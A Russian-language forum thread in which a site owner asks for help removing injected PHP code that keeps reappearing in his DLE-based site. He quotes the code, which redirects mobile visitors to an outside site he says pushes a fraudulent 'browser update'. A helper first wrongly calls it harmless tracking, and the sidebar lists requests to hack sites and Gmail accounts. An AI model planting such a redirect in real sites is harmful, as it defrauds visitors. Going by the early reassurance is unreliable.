Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Проверка безопасности!
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / Тест на уязвимости RSS подписка на сообщения с форума Subscribe
Только для владельцев ресурсов - бесплатное тестирование на уязвимости

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 7315
Проверка безопасности!
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
hitrov


Novice
# | Сообщение добавлено 10.03.2013 20:51:14
Отредактировано 11.03.2013 01:36:27 by Virous

MИспользуйте соответствующие теги для оформления кода.

Virous
Сайт flexfilm.net
Было все нормально, но до недавнего времени стали появляться коды вроде
PHP
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://live-internet.ws/');

после чистки снова, ftp выключен, мб какие шел коды?
Прошу помощи в устранении всех угроз скайп trolshot за дополнительной информацией!
Сказать спасибо Ответить Цитировать

Virous




Gold Member
# | Сообщение добавлено 11.03.2013 01:39:26
Код проверяет, зашел ли пользователь с мобильного телефона и если это так, то переадресовывает на сайт http://live-internet.ws. Live-Internet в свою очередь - это обозреватель статистики посещаемости. Я полагаю, что в случае перехода с телефона тот сайт зафиксирует посещение и вернет обратно. Ничего страшного не произошло. Все в порядке. Если Вам это мешает - обратитесь в поддержку Live-Internet и уточните, как отключить эту опцию.
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

hitrov


Novice
# | Сообщение добавлено 11.03.2013 02:40:58
я знаю что это за код, и при заходе с устройств, указанных в коде, идет переадресация и далее просьба скачать обновления браузера, а там уже если на то воля пользователя при установке со счета снимаются все деньги)
И сайт вртяле каким то образом принадлежит liveinternet)
Сказать спасибо Ответить Цитировать

Virous




Gold Member
# | Сообщение добавлено 11.03.2013 03:11:20
Возможно, Вы правы. В базах антивирусов эта ссылка не значиться. Как вариант - пропишите первой строкой кода что-то вроде "echo(' ');". Тогда заголовок отправлен не будет и переадресация не произойдет. Хотя это конечно не самый лучший вариант. Попробуйте поиграть с настройками доступа к файлу.
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

hitrov


Novice
# | Сообщение добавлено 11.03.2013 13:13:25
Отредактировано 11.03.2013 13:14:56 by hitrov
Этот код был в нескольких php файлах а именно index, engine, go, init.. и тд. и в confog.php была строка с переадресацией с яндекса на гугл, то есть если мой сайт найти через поиск яндекса, то при переходе буду либо на гугл либо на вредоносный сайт перенаправлен....
После чистки всех файлов все стало нормально, вчера опять появились эти коды, поэтому вопрос остается прежним какие уязвимости, шелы сайта)
Насчет echo('') я думаю тут бессмысленно ибо уберечь сайт от повторного появления кода он не сможет :D
p.s/ (DLE 9.3 платформа)
Сказать спасибо Ответить Цитировать

Virous




Gold Member
# | Сообщение добавлено 11.03.2013 18:21:44
hitrov

ибо уберечь сайт от повторного появления кода
Безусловно не сможет. Но заблокирует редирект. Попробуйте загрузить все PHP скрипты и скормить их любому антивирусу. Если используете какую-либо CMS - обновите до последней версии.
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...
  • Кардерский форум Joker’s Stash объявил о закрытии
  • Релиз ядра Linux 5.9
  • Российские хакеры вооружились уязвимостью Zerologon
  • Тысячи приватных звонков американских заключенных оказались в отк...
  • Шифровальщик атаковал немецкую компанию Software AG
  • Злоумышленники используют службу Windows Error Reporting для бесф...
  • Microsoft предупредила о вымогателях, которые выдают себя за МВД ...
  • Инфостилер Valak ворует информацию из почтовых систем Microsoft E...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Взлом и безопасность / Новичкам » Re: Помогите взломать gmail.com
  • Разное / Предложения работы » Re: Зайти на сайт из под Администратора + публикация статьи
  • Взлом и безопасность / WEB сайтов » Брутс для 2fa биржи
  • Разное / Предложения работы » Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Зайти на сайт из под Администратора + публикация статьи
  • Разное / Предложения работы » Зайти на сайт из под Администратора + публикация статьи

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}